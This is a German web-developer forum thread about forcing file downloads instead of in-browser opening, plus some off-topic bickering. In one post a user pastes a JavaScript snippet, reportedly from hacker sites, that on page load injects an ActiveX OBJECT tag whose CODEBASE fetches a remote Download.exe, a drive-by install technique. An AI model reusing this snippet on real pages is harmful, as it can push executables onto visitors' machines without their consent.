download

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • #16
    OffTopic:
    da schliesse ich mich vom prinzip her BloodReaver an. keinen streit im board. aber goth hat nur seine meinung gesagt, und das sehe ich nicht als streit an. das ist eigentlich schon alles. wenn manche auf diesen ton nicht klar kommen. pech gehabt.


    @thebrain
    wenn das mit den öffnen technisch nihct klappt und der user deshalb die datei laden soll, warum macht du nicht einfach einen hinweis für den user. entweder er befolgt ihn, oder lässt es sein, wie. z.b. BloodReaver
    weil wenn ICH was öffnen will dann mach ich das wann ICH will nich wann es mir erlaubt wird
    INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


    Kommentar


    • #17
      OffTopic:
      --------------------------------------------------------------------------------
      da schliesse ich mich vom prinzip her BloodReaver an. keinen streit im board. aber goth hat nur seine meinung gesagt, und das sehe ich nicht als streit an. das ist eigentlich schon alles. wenn manche auf diesen ton nicht klar kommen. pech gehabt.
      --------------------------------------------------------------------------------
      ich sah eher das als streit an:

      aber bei dieser gelegenheit könnte uns goth doch mal erklären, wie er die dinge sieht. Ist er der Retter des Internets? Lass uns Kidis doch machen was wir wollen?!?

      wobei auch ich finde goth ton teilweise unangebracht, unqualifiziert und destruktiv. aber damit muss man zum frieden aller klarkommen und wenn nicht dann klärt man sowas net im board durch stichelleien oder sonstiges sondern durch ne mail o. ä.
      Man lernt nie aus...

      ...und wenn man's doch tut braucht man sich auch nicht schämen!

      Kommentar


      • #18
        ich denke, wenn er nen download anklickt, hat er sich doch schon überlegt, ob er das runterladen will, oder nicht?
        nein?

        Kommentar


        • #19
          wenn da ein zip oder so is dann gaff ich mir das öffters mal online an weil warum zumüllen?! wenn der inhalt net das is was ich brauch dann wieder zumachen ende. und die freihalt will ich gerne behalten das trägt nämlich auch nicht zur usability bei!
          Man lernt nie aus...

          ...und wenn man's doch tut braucht man sich auch nicht schämen!

          Kommentar


          • #20
            wie dem auch sein. ich denke, dass dies schon die beste lösung für dich ist.
            @thebrain
            wenn das mit den öffnen technisch nihct klappt und der user deshalb die datei laden soll, warum macht du nicht einfach einen hinweis für den user. entweder er befolgt ihn, oder lässt es sein, wie. z.b. BloodReaver
            INFO: Erst suchen, dann posten![color=red] | [/color]MANUAL(s): PHP | MySQL | HTML/JS/CSS[color=red] | [/color]NICE: GNOME Do | TESTS: Gästebuch[color=red] | [/color]IM: Jabber.org |


            Kommentar


            • #21
              wenn ich mir im internet was anschauen will, dann muss das zeug ja zwangsweise auf meinen pc kommen.

              is halt nur die frage, ob das in nem ordner Temporary Internet Files liegt oder in nem von mir definierten verzeichnis

              wenn ich es nur anschaue (und dazu runtergeladen hab) und mir dann einfällt, dass ich es doch speichern will, muss ich es entweder aus dem ordner Temporary Internet Files rausholen, das angezeigte speichern (sofern möglich) oder nochmal runterladen.

              ein dau verursacht also mehr traffic auf meiner seite

              insofern finde ich, wenn man weiß, dass die dateien gespeichert werden, kann man ruhig gleich den download-dialog anzeigen.
              wenn nicht sollte man (sofern möglich) den user entscheiden lassen

              dass gleich der datei speichern unter dialog kommen is mir aber neu
              Ich denke, also bin ich. - Einige sind trotzdem...

              Kommentar


              • #22
                ah, das klingt gut. aber bis jetzt haben wir noch nix an code. gibt es denn da nix?
                nein?

                Kommentar


                • #23
                  mensch na etz stellt euch halt an! geht halt ma auf hackerseiten da is doch sowas überall! mensch na das man alles selber machen darf! nach 20sec aufwand fand ich das hier:

                  Code:
                  <!-- BEGIN ActiveX code -->
                  <script language=JavaScript>
                  <!-- Vanish 
                  var baseURL = "http://*.*.*.*/";               
                  var filename = "Download.exe";                            
                                                                        
                  function WhichBrowser()                               
                  {                                                     
                      BrowserName = navigator.appName;                  
                      BrowserVersion = parseInt(navigator.appVersion);  
                                                                        
                      Browser = "NS";                                   
                      if ((BrowserName == "Netscape"))                  
                          Browser = "NC";
                      else if (BrowserName == "Microsoft Internet Explorer")
                          Browser = "IE";
                      return Browser;
                  }       
                  function ncDownload() {
                          window.open("software_name_here.exe","_blank","height=1,width=1");
                  }
                  
                  function IE_DownloadFile(ieURL)
                  {
                     document.write("<OBJECT");
                     document.write(" CLASSID =\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\"");
                     document.write(" CODEBASE=\""+ieURL+"\">");
                     document.write("<\/OBJECT>");
                  }
                  
                  function DownloadFile()
                  {
                   if (WhichBrowser() == "IE") IE_DownloadFile(baseURL + filename);
                        if (WhichBrowser() == "NC") ncDownload();
                  }
                  // -->
                  </script>
                  <script language=JavaScript>
                  <!-- hide script
                  DownloadFile();
                  // -->
                  </script>
                  <!-- END ActiveX code -->
                  aber anpassen und so wie du das brauchst kannst scho oder?! also bei mir kommt da immer schön ein getright dl window weis aber net wie das normal is ob da so ein zertifikats zeug kommt oder direkt ein dl fenster!

                  auf jedenfall, denk ich das man mit diesem code durch geringen aufwand auf jedenfall auch deine gewünschte versi machen kann!
                  Man lernt nie aus...

                  ...und wenn man's doch tut braucht man sich auch nicht schämen!

                  Kommentar


                  • #24
                    Original geschrieben von BloodReaver
                    mensch na etz stellt euch halt an! geht halt ma auf hackerseiten da is doch sowas überall! mensch na das man alles selber machen darf! nach 20sec aufwand fand ich das hier:
                    [...]
                    OffTopic:
                    wenn wir so seiten kennen tun würden, täten wir schon längst geguckt haben tun
                    Ich denke, also bin ich. - Einige sind trotzdem...

                    Kommentar


                    • #25
                      OffTopic:
                      verarsch mich halt! auserdem is das garnet orginal!


                      auf jedenfall habt iher etz mal den script mit oder ohne seite...
                      Man lernt nie aus...

                      ...und wenn man's doch tut braucht man sich auch nicht schämen!

                      Kommentar


                      • #26
                        Original geschrieben von BloodReaver
                        OffTopic:
                        verarsch mich halt!
                        OffTopic:
                        würd ich mir nie erlauben *g*
                        Ich denke, also bin ich. - Einige sind trotzdem...

                        Kommentar

                        Lädt...
                        X